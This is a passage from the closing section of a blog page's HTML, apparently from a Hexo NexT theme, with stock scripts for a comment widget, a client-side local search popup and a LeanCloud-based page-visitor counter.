        appKey: 'aaBboz6UbNeJnPowxKNNDTm2',
        placeholder: 'Just go go',
        avatar:'wavatar',
        guest_info:guest,
        pageSize:'10' || 10,
    });
  </script>



  

  <script type="text/javascript">
    // Popup Window;
    var isfetched = false;
    var isXml = true;
    // Search DB path;
    var search_path = "search.xml";
    if (search_path.length === 0) {
      search_path = "search.xml";
    } else if (/json$/i.test(search_path)) {
      isXml = false;
    }
    var path = "/" + search_path;
    // monitor main search box;

    var onPopupClose = function (e) {
      $('.popup').hide();
      $('#local-search-input').val('');
      $('.search-result-list').remove();
      $('#no-result').remove();
      $(".local-search-pop-overlay").remove();
      $('body').css('overflow', '');
    }

    function proceedsearch() {
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay"></div>')
        .css('overflow', 'hidden');
      $('.search-popup-overlay').click(onPopupClose);
      $('.popup').toggle();
      var $localSearchInput = $('#local-search-input');
      $localSearchInput.attr("autocapitalize", "none");
      $localSearchInput.attr("autocorrect", "off");
      $localSearchInput.focus();
    }

    // search function;
    var searchFunc = function(path, search_id, content_id) {
      'use strict';

      // start loading animation
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay">' +
          '<div id="search-loading-icon">' +
          '<i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>' +
          '</div>' +
          '</div>')
        .css('overflow', 'hidden');
      $("#search-loading-icon").css('margin', '20% auto 0 auto').css('text-align', 'center');

      $.ajax({
        url: path,
        dataType: isXml ? "xml" : "json",
        async: true,
        success: function(res) {
          // get the contents from search data
          isfetched = true;
          $('.popup').detach().appendTo('.header-inner');
          var datas = isXml ? $("entry", res).map(function() {
            return {
              title: $("title", this).text(),
              content: $("content",this).text(),
              url: $("url" , this).text()
            };
          }).get() : res;
          var input = document.getElementById(search_id);
          var resultContent = document.getElementById(content_id);
          var inputEventFunction = function() {
            var searchText = input.value.trim().toLowerCase();
            var keywords = searchText.split(/[\s\-]+/);
            if (keywords.length > 1) {
              keywords.push(searchText);
            }
            var resultItems = [];
            if (searchText.length > 0) {
              // perform local searching
              datas.forEach(function(data) {
                var isMatch = false;
                var hitCount = 0;
                var searchTextCount = 0;
                var title = data.title.trim();
                var titleInLowerCase = title.toLowerCase();
                var content = data.content.trim().replace(/<[^>]+>/g,"");
                var contentInLowerCase = content.toLowerCase();
                var articleUrl = decodeURIComponent(data.url);
                var indexOfTitle = [];
                var indexOfContent = [];
                // only match articles with not empty titles
                if(title != '') {
                  keywords.forEach(function(keyword) {
                    function getIndexByWord(word, text, caseSensitive) {
                      var wordLen = word.length;
                      if (wordLen === 0) {
                        return [];
                      }
                      var startPosition = 0, position = [], index = [];
                      if (!caseSensitive) {
                        text = text.toLowerCase();
                        word = word.toLowerCase();
                      }
                      while ((position = text.indexOf(word, startPosition)) > -1) {
                        index.push({position: position, word: word});
                        startPosition = position + wordLen;
                      }
                      return index;
                    }

                    indexOfTitle = indexOfTitle.concat(getIndexByWord(keyword, titleInLowerCase, false));
                    indexOfContent = indexOfContent.concat(getIndexByWord(keyword, contentInLowerCase, false));
                  });
                  if (indexOfTitle.length > 0 || indexOfContent.length > 0) {
                    isMatch = true;
                    hitCount = indexOfTitle.length + indexOfContent.length;
                  }
                }

                // show search results

                if (isMatch) {
                  // sort index by position of keyword

                  [indexOfTitle, indexOfContent].forEach(function (index) {
                    index.sort(function (itemLeft, itemRight) {
                      if (itemRight.position !== itemLeft.position) {
                        return itemRight.position - itemLeft.position;
                      } else {
                        return itemLeft.word.length - itemRight.word.length;
                      }
                    });
                  });

                  // merge hits into slices

                  function mergeIntoSlice(text, start, end, index) {
                    var item = index[index.length - 1];
                    var position = item.position;
                    var word = item.word;
                    var hits = [];
                    var searchTextCountInSlice = 0;
                    while (position + word.length <= end && index.length != 0) {
                      if (word === searchText) {
                        searchTextCountInSlice++;
                      }
                      hits.push({position: position, length: word.length});
                      var wordEnd = position + word.length;

                      // move to next position of hit

                      index.pop();
                      while (index.length != 0) {
                        item = index[index.length - 1];
                        position = item.position;
                        word = item.word;
                        if (wordEnd > position) {
                          index.pop();
                        } else {
                          break;
                        }
                      }
                    }
                    searchTextCount += searchTextCountInSlice;
                    return {
                      hits: hits,
                      start: start,
                      end: end,
                      searchTextCount: searchTextCountInSlice
                    };
                  }

                  var slicesOfTitle = [];
                  if (indexOfTitle.length != 0) {
                    slicesOfTitle.push(mergeIntoSlice(title, 0, title.length, indexOfTitle));
                  }

                  var slicesOfContent = [];
                  while (indexOfContent.length != 0) {
                    var item = indexOfContent[indexOfContent.length - 1];
                    var position = item.position;
                    var word = item.word;
                    // cut out 100 characters
                    var start = position - 20;
                    var end = position + 80;
                    if(start < 0){
                      start = 0;
                    }
                    if (end < position + word.length) {
                      end = position + word.length;
                    }
                    if(end > content.length){
                      end = content.length;
                    }
                    slicesOfContent.push(mergeIntoSlice(content, start, end, indexOfContent));
                  }

                  // sort slices in content by search text's count and hits' count

                  slicesOfContent.sort(function (sliceLeft, sliceRight) {
                    if (sliceLeft.searchTextCount !== sliceRight.searchTextCount) {
                      return sliceRight.searchTextCount - sliceLeft.searchTextCount;
                    } else if (sliceLeft.hits.length !== sliceRight.hits.length) {
                      return sliceRight.hits.length - sliceLeft.hits.length;
                    } else {
                      return sliceLeft.start - sliceRight.start;
                    }
                  });

                  // select top N slices in content

                  var upperBound = parseInt('1');
                  if (upperBound >= 0) {
                    slicesOfContent = slicesOfContent.slice(0, upperBound);
                  }

                  // highlight title and content

                  function highlightKeyword(text, slice) {
                    var result = '';
                    var prevEnd = slice.start;
                    slice.hits.forEach(function (hit) {
                      result += text.substring(prevEnd, hit.position);
                      var end = hit.position + hit.length;
                      result += '<b class="search-keyword">' + text.substring(hit.position, end) + '</b>';
                      prevEnd = end;
                    });
                    result += text.substring(prevEnd, slice.end);
                    return result;
                  }

                  var resultItem = '';

                  if (slicesOfTitle.length != 0) {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + highlightKeyword(title, slicesOfTitle[0]) + "</a>";
                  } else {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + title + "</a>";
                  }

                  slicesOfContent.forEach(function (slice) {
                    resultItem += "<a href='" + articleUrl + "'>" +
                      "<p class=\"search-result\">" + highlightKeyword(content, slice) +
                      "...</p>" + "</a>";
                  });

                  resultItem += "</li>";
                  resultItems.push({
                    item: resultItem,
                    searchTextCount: searchTextCount,
                    hitCount: hitCount,
                    id: resultItems.length
                  });
                }
              })
            };
            if (keywords.length === 1 && keywords[0] === "") {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-search fa-5x" /></div>'
            } else if (resultItems.length === 0) {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-frown-o fa-5x" /></div>'
            } else {
              resultItems.sort(function (resultLeft, resultRight) {
                if (resultLeft.searchTextCount !== resultRight.searchTextCount) {
                  return resultRight.searchTextCount - resultLeft.searchTextCount;
                } else if (resultLeft.hitCount !== resultRight.hitCount) {
                  return resultRight.hitCount - resultLeft.hitCount;
                } else {
                  return resultRight.id - resultLeft.id;
                }
              });
              var searchResultList = '<ul class=\"search-result-list\">';
              resultItems.forEach(function (result) {
                searchResultList += result.item;
              })
              searchResultList += "</ul>";
              resultContent.innerHTML = searchResultList;
            }
          }

          if ('auto' === 'auto') {
            input.addEventListener('input', inputEventFunction);
          } else {
            $('.search-icon').click(inputEventFunction);
            input.addEventListener('keypress', function (event) {
              if (event.keyCode === 13) {
                inputEventFunction();
              }
            });
          }

          // remove loading animation
          $(".local-search-pop-overlay").remove();
          $('body').css('overflow', '');

          proceedsearch();
        }
      });
    }

    // handle and trigger popup window;
    $('.popup-trigger').click(function(e) {
      e.stopPropagation();
      if (isfetched === false) {
        searchFunc(path, 'local-search-input', 'local-search-result');
      } else {
        proceedsearch();
      };
    });

    $('.popup-btn-close').click(onPopupClose);
    $('.popup').click(function(e){
      e.stopPropagation();
    });
    $(document).on('keyup', function (event) {
      var shouldDismissSearchPopup = event.which === 27 &&
        $('.search-popup').is(':visible');
      if (shouldDismissSearchPopup) {
        onPopupClose();
      }
    });
  </script>





  

  
  <script src="https://cdn1.lncld.net/static/js/av-core-mini-0.6.4.js"></script>
  <script>AV.initialize("XzzzFqxY7zSnAm9am6FHg6do-gzGzoHsz", "aaBboz6UbNeJnPowxKNNDTm2");</script>
  <script>
    function showTime(Counter) {
      var query = new AV.Query(Counter);
      var entries = [];
      var $visitors = $(".leancloud_visitors");

      $visitors.each(function () {
        entries.push( $(this).attr("id").trim() );
      });

      query.containedIn('url', entries);
      query.find()
        .done(function (results) {
          var COUNT_CONTAINER_REF = '.leancloud-visitors-count';

          if (results.length === 0) {
            $visitors.find(COUNT_CONTAINER_REF).text(0);
            return;
          }

          for (var i = 0; i < results.length; i++) {
            var item = results[i];
            var url = item.get('url');
            var time = item.get('time');
            var element = document.getElementById(url);

            $(element).find(COUNT_CONTAINER_REF).text(time);
          }
          for(var i = 0; i < entries.length; i++) {
            var url = entries[i];
            var element = document.getElementById(url);
            var countSpan = $(element).find(COUNT_CONTAINER_REF);
            if( countSpan.text() == '') {
              countSpan.text(0);
            }
          }
        })
        .fail(function (object, error) {
          console.log("Error: " + error.code + " " + error.message);
        });
    }

    function addCount(Counter) {
      var $visitors = $(".leancloud_visitors");
      var url = $visitors.attr('id').trim();
      var title = $visitors.attr('data-flag-title').trim();
      var query = new AV.Query(Counter);

      query.equalTo("url", url);
      query.find({
        success: function(results) {
          if (results.length > 0) {
            var counter = results[0];
            counter.fetchWhenSave(true);
            counter.increment("time");
            counter.save(null, {
              success: function(counter) {
                var $element = $(document.getElementById(url));
                $element.find('.leancloud-visitors-count').text(counter.get('time'));
              },
              error: function(counter, error) {
                console.log('Failed to save Visitor num, with error message: ' + error.message);
              }
            });
          } else {
            var newcounter = new Counter();
            /* Set ACL */
            var acl = new AV.ACL();
            acl.setPublicReadAccess(true);
            acl.setPublicWriteAccess(true);
            newcounter.setACL(acl);
            /* End Set ACL */
            newcounter.set("title", title);
            newcounter.set("url", url);
            newcounter.set("time", 1);
            newcounter.save(null, {
              success: function(newcounter) {
                var $element = $(document.getElementById(url));
                $element.find('.leancloud-visitors-count').text(newcounter.get('time'));
              },
              error: function(newcounter, error) {
                console.log('Failed to create');
              }
            });
          }
        },
        error: function(error) {
          console.log('Error:' + error.code + " " + error.message);
        }
      });
    }

    $(function() {
      var Counter = AV.Object.extend("Counter");
      if ($('.leancloud_visitors').length == 1) {
        addCount(Counter);
      } else if ($('.post-title-link').length > 1) {
        showTime(Counter);
      }
    });
  </script>



  

  

  
  

  

  

  

</body>
</html>
